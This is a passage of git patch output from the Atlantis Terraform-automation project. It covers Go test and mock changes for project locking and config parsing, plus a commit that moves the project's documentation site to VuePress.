+// State: github.String("closed"), +// } +// cmdResult := events.CommandResult{} +// for _, c := range []events.CommandName{events.Plan, events.Apply} { +// setup(t) +// cmd := events.CommentCommand{ +// Name: c, +// Workspace: "workspace", +// } +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) +// When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) +// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) +// switch c { +// case events.Plan: +// When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) +// case events.Apply: +// When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) +// } +// +// ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) +// +// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) +// _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() +// Equals(t, cmdResult, response) +// vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) +// workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) +// } +//} + +//func TestRunCommentCommand_ForkPREnabled(t *testing.T) { +// t.Log("when running a plan on a fork PR, it should succeed") +// setup(t) +// +// // Enable forked PRs. +// ch.AllowForkPRs = true +// defer func() { ch.AllowForkPRs = false }() // Reset after test. 
+// +// var pull github.PullRequest +// cmdResponse := events.CommandResult{} +// cmd := events.CommentCommand{ +// Name: events.Plan, +// Workspace: "workspace", +// } +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) +// headRepo := fixtures.GithubRepo +// headRepo.FullName = "forkrepo/atlantis" +// headRepo.Owner = "forkrepo" +// When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil) +// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) +// When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) +// +// ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd) +// +// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) +// _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() +// Equals(t, cmdResponse, response) +// vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) +// workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) +//} diff --git a/server/events/project_command_builder_test.go b/server/events/project_command_builder_test.go index 79457f0dd2..b8fb20c1ca 100644 --- a/server/events/project_command_builder_test.go +++ b/server/events/project_command_builder_test.go @@ -1 +1,29 @@ package events_test + +//. 
"github.com/runatlantis/atlantis/testing" + +//func TestBuildAutoplanCommands(t *testing.T) { +// tmpDir, cleanup := TempDir(t) +// defer cleanup() +// +// workspace := mocks.NewMockAtlantisWorkspace() +// vcsClient := vcsmocks.NewMockClientProxy() +// +// builder := &events.DefaultProjectCommandBuilder{ +// AtlantisWorkspaceLocker: events.NewDefaultAtlantisWorkspaceLocker(), +// Workspace: workspace, +// ParserValidator: &yaml.ParserValidator{}, +// VCSClient: vcsClient, +// ProjectFinder: &events.DefaultProjectFinder{}, +// } +// +// // If autoplan is false, should return empty steps. +// ctxs, err := builder.BuildAutoplanCommands(&events.CommandContext{ +// BaseRepo: models.Repo{}, +// HeadRepo: models.Repo{}, +// Pull: models.PullRequest{}, +// User: models.User{}, +// Log: nil, +// }) +// Ok(t, err) +//} diff --git a/server/events/project_command_runner.go b/server/events/project_command_runner.go index 45117c3a06..513a32fc1c 100644 --- a/server/events/project_command_runner.go +++ b/server/events/project_command_runner.go @@ -153,7 +153,7 @@ func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCo for _, req := range ctx.ProjectConfig.ApplyRequirements { switch req { case "approved": - approved, err := p.PullApprovedChecker.PullIsApproved(ctx.BaseRepo, ctx.Pull) + approved, err := p.PullApprovedChecker.PullIsApproved(ctx.BaseRepo, ctx.Pull) // nolint: vetshadow if err != nil { return ProjectCommandResult{Error: errors.Wrap(err, "checking if pull request was approved")} } diff --git a/server/events/project_locker_test.go b/server/events/project_locker_test.go index cd6c80d91a..232e144f50 100644 --- a/server/events/project_locker_test.go +++ b/server/events/project_locker_test.go @@ -13,257 +13,117 @@ // package events_test -//import ( -// . "github.com/petergtz/pegomock" -// . 
"github.com/runatlantis/atlantis/testing" -//) +import ( + "testing" -//var ctx = events.CommandContext{ -// Command: &events.Command{ -// Name: events.Plan, -// }, -// Log: logging.NewNoopLogger(), -//} -//var project = models.Project{} -// -//func TestExecute_LockErr(t *testing.T) { -// t.Log("when there is an error returned from TryLock we return it") -// p, l, _, _ := setupPreExecuteTest(t) -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{}, errors.New("err")) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, "acquiring lock: err", res.ProjectResult.Error.Error()) -//} -// -//func TestExecute_LockFailed(t *testing.T) { -// t.Log("when we can't acquire a lock for this project and the lock is owned by a different pull, we get an error") -// p, l, _, _ := setupPreExecuteTest(t) -// // The response has LockAcquired: false and the pull request is a number -// // different than the current pull. -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ -// LockAcquired: false, -// CurrLock: models.ProjectLock{Pull: models.PullRequest{Num: ctx.Pull.Num + 1}}, -// }, nil) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, "This project is currently locked by #1. 
The locking plan must be applied or discarded before future plans can execute.", res.ProjectResult.Failure) -//} -// -//func TestExecute_ConfigErr(t *testing.T) { -// t.Log("when there is an error loading config, we return it") -// p, l, _, _ := setupPreExecuteTest(t) -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ -// LockAcquired: true, -// }, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err")) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, "err", res.ProjectResult.Error.Error()) -//} -// -//func TestExecute_PreInitErr(t *testing.T) { -// t.Log("when the project is on tf >= 0.9 and we run a `pre_init` that returns an error we return it") -// p, l, tm, r := setupPreExecuteTest(t) -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ -// LockAcquired: true, -// }, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{ -// PreInit: []string{"pre-init"}, -// }, nil) -// tfVersion, _ := version.NewVersion("0.9.0") -// When(tm.Version()).ThenReturn(tfVersion) -// When(r.Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")).ThenReturn("", errors.New("err")) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, "running pre_init commands: err", res.ProjectResult.Error.Error()) -//} -// -//func TestExecute_InitErr(t *testing.T) { -// t.Log("when the project is on tf >= 0.9 and we run `init` that returns an error we return it") -// p, l, tm, _ := setupPreExecuteTest(t) -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ -// LockAcquired: true, -// }, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, nil) -// tfVersion, _ := version.NewVersion("0.9.0") -// 
When(tm.Version()).ThenReturn(tfVersion) -// When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, errors.New("err")) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, "err", res.ProjectResult.Error.Error()) -//} -// -//func TestExecute_PreGetErr(t *testing.T) { -// t.Log("when the project is on tf < 0.9 and we run a `pre_get` that returns an error we return it") -// p, l, tm, r := setupPreExecuteTest(t) -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ -// LockAcquired: true, -// }, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{ -// PreGet: []string{"pre-get"}, -// }, nil) -// tfVersion, _ := version.NewVersion("0.8") -// When(tm.Version()).ThenReturn(tfVersion) -// When(r.Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")).ThenReturn("", errors.New("err")) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, "running pre_get commands: err", res.ProjectResult.Error.Error()) -//} -// -//func TestExecute_GetErr(t *testing.T) { -// t.Log("when the project is on tf < 0.9 and we run `get` that returns an error we return it") -// p, l, tm, _ := setupPreExecuteTest(t) -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ -// LockAcquired: true, -// }, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, nil) -// tfVersion, _ := version.NewVersion("0.8") -// When(tm.Version()).ThenReturn(tfVersion) -// When(tm.RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")).ThenReturn("", errors.New("err")) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, "err", res.ProjectResult.Error.Error()) -//} -// -//func TestExecute_PreCommandErr(t *testing.T) { -// t.Log("when we get an error running pre commands we return it") -// p, l, tm, r := setupPreExecuteTest(t) -// 
When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ -// LockAcquired: true, -// }, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{ -// PrePlan: []string{"command"}, -// }, nil) -// tfVersion, _ := version.NewVersion("0.9") -// When(tm.Version()).ThenReturn(tfVersion) -// When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil) -// When(r.Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")).ThenReturn("", errors.New("err")) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, "running pre_plan commands: err", res.ProjectResult.Error.Error()) -//} -// -//func TestExecute_SuccessTF9(t *testing.T) { -// t.Log("when the project is on tf >= 0.9 it should be successful") -// p, l, tm, r := setupPreExecuteTest(t) -// lockResponse := locking.TryLockResponse{ -// LockAcquired: true, -// } -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// config := events.ProjectConfig{ -// PreInit: []string{"pre-init"}, -// } -// When(p.ParserValidator.Read("")).ThenReturn(config, nil) -// tfVersion, _ := version.NewVersion("0.9") -// When(tm.Version()).ThenReturn(tfVersion) -// When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, events.TryLockResponse{ -// ProjectConfig: config, -// TerraformVersion: tfVersion, -// LockResponse: lockResponse, -// }, res) -// tm.VerifyWasCalledOnce().Init(ctx.Log, "", "", nil, tfVersion) -// r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init") -//} -// -//func TestExecute_SuccessTF8(t *testing.T) { -// t.Log("when the project is on tf < 0.9 it should be successful") -// p, l, tm, r := setupPreExecuteTest(t) -// lockResponse := locking.TryLockResponse{ -// LockAcquired: true, -// } -// When(l.TryLock(project, 
"", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// config := events.ProjectConfig{ -// PreGet: []string{"pre-get"}, -// } -// When(p.ParserValidator.Read("")).ThenReturn(config, nil) -// tfVersion, _ := version.NewVersion("0.8") -// When(tm.Version()).ThenReturn(tfVersion) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, events.TryLockResponse{ -// ProjectConfig: config, -// TerraformVersion: tfVersion, -// LockResponse: lockResponse, -// }, res) -// tm.VerifyWasCalledOnce().RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "") -// r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get") -//} -// -//func TestExecute_SuccessPrePlan(t *testing.T) { -// t.Log("when there are pre_plan commands they are run") -// p, l, tm, r := setupPreExecuteTest(t) -// lockResponse := locking.TryLockResponse{ -// LockAcquired: true, -// } -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// config := events.ProjectConfig{ -// PrePlan: []string{"command"}, -// } -// When(p.ParserValidator.Read("")).ThenReturn(config, nil) -// tfVersion, _ := version.NewVersion("0.9") -// When(tm.Version()).ThenReturn(tfVersion) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, events.TryLockResponse{ -// ProjectConfig: config, -// TerraformVersion: tfVersion, -// LockResponse: lockResponse, -// }, res) -// r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan") -//} -// -//func TestExecute_SuccessPreApply(t *testing.T) { -// t.Log("when there are pre_apply commands they are run") -// p, l, tm, r := setupPreExecuteTest(t) -// lockResponse := locking.TryLockResponse{ -// LockAcquired: true, -// } -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// 
config := events.ProjectConfig{ -// PreApply: []string{"command"}, -// } -// When(p.ParserValidator.Read("")).ThenReturn(config, nil) -// tfVersion, _ := version.NewVersion("0.9") -// When(tm.Version()).ThenReturn(tfVersion) -// -// cpCtx := deepcopy.Copy(ctx).(events.CommandContext) -// cpCtx.Command = &events.Command{ -// Name: events.Apply, -// } -// cpCtx.Log = logging.NewNoopLogger() -// -// res := p.Execute(&cpCtx, "", project) -// Equals(t, events.TryLockResponse{ -// ProjectConfig: config, -// TerraformVersion: tfVersion, -// LockResponse: lockResponse, -// }, res) -// r.VerifyWasCalledOnce().Execute(cpCtx.Log, []string{"command"}, "", "", tfVersion, "pre_apply") -//} -// -//func setupPreExecuteTest(t *testing.T) (*events.DefaultProjectLocker, *lmocks.MockLocker, *tmocks.MockClient, *rmocks.MockRunner) { -// RegisterMockTestingT(t) -// l := lmocks.NewMockLocker() -// cr := mocks.NewMockProjectConfigReader() -// tm := tmocks.NewMockClient() -// r := rmocks.NewMockRunner() -// return &events.DefaultProjectLocker{ -// Locker: l, -// ParserValidator: cr, -// Terraform: tm, -// Run: r, -// }, l, tm, r -//} + . "github.com/petergtz/pegomock" + "github.com/runatlantis/atlantis/server/events" + "github.com/runatlantis/atlantis/server/events/locking" + "github.com/runatlantis/atlantis/server/events/locking/mocks" + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/logging" + . 
"github.com/runatlantis/atlantis/testing" +) + +func TestDefaultProjectLocker_TryLockWhenLocked(t *testing.T) { + mockLocker := mocks.NewMockLocker() + locker := events.DefaultProjectLocker{ + Locker: mockLocker, + } + expProject := models.Project{} + expWorkspace := "default" + expPull := models.PullRequest{} + expUser := models.User{} + + lockingPull := models.PullRequest{ + Num: 2, + } + When(mockLocker.TryLock(expProject, expWorkspace, expPull, expUser)).ThenReturn( + locking.TryLockResponse{ + LockAcquired: false, + CurrLock: models.ProjectLock{ + Pull: lockingPull, + }, + LockKey: "", + }, + nil, + ) + res, err := locker.TryLock(logging.NewNoopLogger(), expPull, expUser, expWorkspace, expProject) + Ok(t, err) + Equals(t, &events.TryLockResponse{ + LockAcquired: false, + LockFailureReason: "This project is currently locked by #2. The locking plan must be applied or discarded before future plans can execute.", + }, res) +} + +func TestDefaultProjectLocker_TryLockWhenLockedSamePull(t *testing.T) { + RegisterMockTestingT(t) + mockLocker := mocks.NewMockLocker() + locker := events.DefaultProjectLocker{ + Locker: mockLocker, + } + expProject := models.Project{} + expWorkspace := "default" + expPull := models.PullRequest{Num: 2} + expUser := models.User{} + + lockingPull := models.PullRequest{ + Num: 2, + } + lockKey := "key" + When(mockLocker.TryLock(expProject, expWorkspace, expPull, expUser)).ThenReturn( + locking.TryLockResponse{ + LockAcquired: false, + CurrLock: models.ProjectLock{ + Pull: lockingPull, + }, + LockKey: lockKey, + }, + nil, + ) + res, err := locker.TryLock(logging.NewNoopLogger(), expPull, expUser, expWorkspace, expProject) + Ok(t, err) + Equals(t, true, res.LockAcquired) + + // UnlockFn should work. 
+ mockLocker.VerifyWasCalled(Never()).Unlock(lockKey) + err = res.UnlockFn() + Ok(t, err) + mockLocker.VerifyWasCalledOnce().Unlock(lockKey) +} + +func TestDefaultProjectLocker_TryLockUnlocked(t *testing.T) { + RegisterMockTestingT(t) + mockLocker := mocks.NewMockLocker() + locker := events.DefaultProjectLocker{ + Locker: mockLocker, + } + expProject := models.Project{} + expWorkspace := "default" + expPull := models.PullRequest{Num: 2} + expUser := models.User{} + + lockingPull := models.PullRequest{ + Num: 2, + } + lockKey := "key" + When(mockLocker.TryLock(expProject, expWorkspace, expPull, expUser)).ThenReturn( + locking.TryLockResponse{ + LockAcquired: true, + CurrLock: models.ProjectLock{ + Pull: lockingPull, + }, + LockKey: lockKey, + }, + nil, + ) + res, err := locker.TryLock(logging.NewNoopLogger(), expPull, expUser, expWorkspace, expProject) + Ok(t, err) + Equals(t, true, res.LockAcquired) + + // UnlockFn should work. + mockLocker.VerifyWasCalled(Never()).Unlock(lockKey) + err = res.UnlockFn() + Ok(t, err) + mockLocker.VerifyWasCalledOnce().Unlock(lockKey) +} diff --git a/server/events/yaml/mocks/matchers/valid_spec.go b/server/events/yaml/mocks/matchers/valid_spec.go new file mode 100644 index 0000000000..6aba4616e6 --- /dev/null +++ b/server/events/yaml/mocks/matchers/valid_spec.go @@ -0,0 +1,20 @@ +package matchers + +import ( + "reflect" + + "github.com/petergtz/pegomock" + valid "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +func AnyValidSpec() valid.Spec { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(valid.Spec))(nil)).Elem())) + var nullValue valid.Spec + return nullValue +} + +func EqValidSpec(value valid.Spec) valid.Spec { + pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) + var nullValue valid.Spec + return nullValue +} diff --git a/server/events/yaml/mocks/mock_parser_validator.go b/server/events/yaml/mocks/mock_parser_validator.go new file mode 100644 index 0000000000..f66c58778a --- 
/dev/null +++ b/server/events/yaml/mocks/mock_parser_validator.go @@ -0,0 +1,80 @@ +// Automatically generated by pegomock. DO NOT EDIT! +// Source: github.com/runatlantis/atlantis/server/events/yaml (interfaces: ParserValidator) + +package mocks + +import ( + "reflect" + + pegomock "github.com/petergtz/pegomock" + valid "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +type MockParserValidator struct { + fail func(message string, callerSkip ...int) +} + +func NewMockParserValidator() *MockParserValidator { + return &MockParserValidator{fail: pegomock.GlobalFailHandler} +} + +func (mock *MockParserValidator) ReadConfig(repoDir string) (valid.Spec, error) { + params := []pegomock.Param{repoDir} + result := pegomock.GetGenericMockFrom(mock).Invoke("ReadConfig", params, []reflect.Type{reflect.TypeOf((*valid.Spec)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 valid.Spec + var ret1 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(valid.Spec) + } + if result[1] != nil { + ret1 = result[1].(error) + } + } + return ret0, ret1 +} + +func (mock *MockParserValidator) VerifyWasCalledOnce() *VerifierParserValidator { + return &VerifierParserValidator{mock, pegomock.Times(1), nil} +} + +func (mock *MockParserValidator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierParserValidator { + return &VerifierParserValidator{mock, invocationCountMatcher, nil} +} + +func (mock *MockParserValidator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierParserValidator { + return &VerifierParserValidator{mock, invocationCountMatcher, inOrderContext} +} + +type VerifierParserValidator struct { + mock *MockParserValidator + invocationCountMatcher pegomock.Matcher + inOrderContext *pegomock.InOrderContext +} + +func (verifier *VerifierParserValidator) ReadConfig(repoDir string) *ParserValidator_ReadConfig_OngoingVerification { + params := 
[]pegomock.Param{repoDir} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ReadConfig", params) + return &ParserValidator_ReadConfig_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type ParserValidator_ReadConfig_OngoingVerification struct { + mock *MockParserValidator + methodInvocations []pegomock.MethodInvocation +} + +func (c *ParserValidator_ReadConfig_OngoingVerification) GetCapturedArguments() string { + repoDir := c.GetAllCapturedArguments() + return repoDir[len(repoDir)-1] +} + +func (c *ParserValidator_ReadConfig_OngoingVerification) GetAllCapturedArguments() (_param0 []string) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]string, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(string) + } + } + return +} diff --git a/server/events/yaml/raw/step.go b/server/events/yaml/raw/step.go index af17335c1b..a5b5c633eb 100644 --- a/server/events/yaml/raw/step.go +++ b/server/events/yaml/raw/step.go @@ -130,6 +130,8 @@ func (s Step) Validate() error { for k := range elem { keys = append(keys, k) } + // Sort so tests can be deterministic. 
+ sort.Strings(keys) if len(keys) > 1 { return fmt.Errorf("step element can only contain a single key, found %d: %s", diff --git a/server/server.go b/server/server.go index d02c1c9221..45ad488912 100644 --- a/server/server.go +++ b/server/server.go @@ -232,10 +232,11 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { AllowForkPRs: userConfig.AllowForkPRs, AllowForkPRsFlag: config.AllowForkPRsFlag, ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{ - ParserValidator: &yaml.ParserValidator{}, - ProjectFinder: &events.DefaultProjectFinder{}, - VCSClient: vcsClient, - Workspace: workspace, + ParserValidator: &yaml.ParserValidator{}, + ProjectFinder: &events.DefaultProjectFinder{}, + VCSClient: vcsClient, + Workspace: workspace, + AtlantisWorkspaceLocker: workspaceLocker, }, ProjectCommandRunner: &events.ProjectCommandRunner{ Locker: projectLocker, From dd12ce167ee98ef97154927008a3ec60e15a3293 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Fri, 22 Jun 2018 17:12:40 +0100 Subject: [PATCH 45/69] Create docs with VuePress --- .gitignore | 1 + Makefile | 6 +- package.json | 9 + runatlantis.io/.vuepress/components/Home.vue | 21 + runatlantis.io/.vuepress/config.js | 41 + runatlantis.io/.vuepress/override.styl | 40 + .../public/apple-touch-icon-114x114.png | Bin 0 -> 11680 bytes .../public/apple-touch-icon-120x120.png | Bin 0 -> 11094 bytes .../public/apple-touch-icon-144x144.png | Bin 0 -> 12662 bytes .../public/apple-touch-icon-152x152.png | Bin 0 -> 16807 bytes .../public/apple-touch-icon-57x57.png | Bin 0 -> 3622 bytes .../public/apple-touch-icon-60x60.png | Bin 0 -> 4016 bytes .../public/apple-touch-icon-72x72.png | Bin 0 -> 4854 bytes .../public/apple-touch-icon-76x76.png | Bin 0 -> 5739 bytes .../.vuepress/public/favicon-128.png | Bin 0 -> 6555 bytes .../.vuepress/public/favicon-16x16.png | Bin 0 -> 629 bytes .../.vuepress/public/favicon-196x196.png | Bin 0 -> 27206 bytes .../.vuepress/public/favicon-32x32.png | Bin 0 -> 1381 bytes 
.../.vuepress/public/favicon-96x96.png | Bin 0 -> 6105 bytes runatlantis.io/.vuepress/public/favicon.ico | Bin 0 -> 34494 bytes runatlantis.io/.vuepress/public/hero.png | Bin 0 -> 14750 bytes .../.vuepress/public/mstile-144x144.png | Bin 0 -> 12662 bytes .../.vuepress/public/mstile-150x150.png | Bin 0 -> 55616 bytes .../.vuepress/public/mstile-310x150.png | Bin 0 -> 112703 bytes .../.vuepress/public/mstile-310x310.png | Bin 0 -> 227955 bytes .../.vuepress/public/mstile-70x70.png | Bin 0 -> 6555 bytes runatlantis.io/README.md | 16 + runatlantis.io/docs/README.md | 405 ++ runatlantis.io/docs/deployment.md | 374 + runatlantis.io/docs/getting-started.md | 0 runatlantis.io/docs/images/atlantis-logo.png | Bin 0 -> 14750 bytes .../docs/images/atlantis-walkthrough-icon.png | Bin 0 -> 79344 bytes .../docs/images/pr-comment-apply.png | Bin 0 -> 19474 bytes .../docs/images/pr-comment-help.png | Bin 0 -> 19736 bytes .../docs/images/pr-comment-plan.png | Bin 0 -> 19305 bytes runatlantis.io/docs/images/status.png | Bin 0 -> 45991 bytes runatlantis.io/docs/pull-request-commands.md | 39 + yarn.lock | 6179 +++++++++++++++++ 38 files changed, 7128 insertions(+), 3 deletions(-) create mode 100644 package.json create mode 100644 runatlantis.io/.vuepress/components/Home.vue create mode 100644 runatlantis.io/.vuepress/config.js create mode 100644 runatlantis.io/.vuepress/override.styl create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-114x114.png create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-120x120.png create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-144x144.png create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-152x152.png create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-57x57.png create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-60x60.png create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-72x72.png create mode 100644 
runatlantis.io/.vuepress/public/apple-touch-icon-76x76.png create mode 100644 runatlantis.io/.vuepress/public/favicon-128.png create mode 100644 runatlantis.io/.vuepress/public/favicon-16x16.png create mode 100644 runatlantis.io/.vuepress/public/favicon-196x196.png create mode 100644 runatlantis.io/.vuepress/public/favicon-32x32.png create mode 100644 runatlantis.io/.vuepress/public/favicon-96x96.png create mode 100644 runatlantis.io/.vuepress/public/favicon.ico create mode 100644 runatlantis.io/.vuepress/public/hero.png create mode 100644 runatlantis.io/.vuepress/public/mstile-144x144.png create mode 100644 runatlantis.io/.vuepress/public/mstile-150x150.png create mode 100644 runatlantis.io/.vuepress/public/mstile-310x150.png create mode 100644 runatlantis.io/.vuepress/public/mstile-310x310.png create mode 100644 runatlantis.io/.vuepress/public/mstile-70x70.png create mode 100644 runatlantis.io/README.md create mode 100644 runatlantis.io/docs/README.md create mode 100644 runatlantis.io/docs/deployment.md create mode 100644 runatlantis.io/docs/getting-started.md create mode 100644 runatlantis.io/docs/images/atlantis-logo.png create mode 100644 runatlantis.io/docs/images/atlantis-walkthrough-icon.png create mode 100644 runatlantis.io/docs/images/pr-comment-apply.png create mode 100644 runatlantis.io/docs/images/pr-comment-help.png create mode 100644 runatlantis.io/docs/images/pr-comment-plan.png create mode 100644 runatlantis.io/docs/images/status.png create mode 100644 runatlantis.io/docs/pull-request-commands.md create mode 100644 yarn.lock diff --git a/.gitignore b/.gitignore index 4da26ca0b0..b84b2a1911 100644 --- a/.gitignore +++ b/.gitignore @@ -8,3 +8,4 @@ website/src/public .DS_Store .cover .terraform/ +node_modules/ diff --git a/Makefile b/Makefile index c2510ac725..b2d0129be6 100644 --- a/Makefile +++ b/Makefile @@ -82,9 +82,9 @@ end-to-end-tests: ## Run e2e tests ./scripts/e2e.sh generate-website-html: ## Generate HTML for website - cd website/src && hugo 
-d ../html + yarn website:build upload-website-html: ## Upload generated website to s3 aws s3 rm s3://www.runatlantis.io/ --recursive - aws s3 sync website/html/ s3://www.runatlantis.io/ - rm -rf website/html/ + aws s3 sync runatlantis.io/.vuepress/dist/ s3://www.runatlantis.io/ + rm -rf runatlantis.io/.vuepress/dist diff --git a/package.json b/package.json new file mode 100644 index 0000000000..a74a965486 --- /dev/null +++ b/package.json @@ -0,0 +1,9 @@ +{ + "devDependencies": { + "vuepress": "^0.10.2" + }, + "scripts": { + "website:dev": "vuepress dev runatlantis.io", + "website:build": "vuepress build runatlantis.io" + } +} diff --git a/runatlantis.io/.vuepress/components/Home.vue b/runatlantis.io/.vuepress/components/Home.vue new file mode 100644 index 0000000000..d118f3a8c1 --- /dev/null +++ b/runatlantis.io/.vuepress/components/Home.vue @@ -0,0 +1,21 @@ + diff --git a/runatlantis.io/.vuepress/config.js b/runatlantis.io/.vuepress/config.js new file mode 100644 index 0000000000..9e2f6a54ed --- /dev/null +++ b/runatlantis.io/.vuepress/config.js @@ -0,0 +1,41 @@ +module.exports = { + title: 'Atlantis', + description: 'Terraform Automation by Pull Request', + head: [ + ['link', { rel: 'icon', type: 'image/png', href: 'favicon-196x196.png', sizes: '196x196' }], + ['link', { rel: 'icon', type: 'image/png', href: 'favicon-96x96.png', sizes: '96x96' }], + ['link', { rel: 'icon', type: 'image/png', href: 'favicon-32x32.png', sizes: '32x32' }], + ['link', { rel: 'icon', type: 'image/png', href: 'favicon-16x16.png', sizes: '16x16' }], + ['link', { rel: 'icon', type: 'image/png', href: 'favicon-128.png', sizes: '128x128' }], + ['link', { rel: 'apple-touch-icon-precomposed', sizes: '57x57', href: 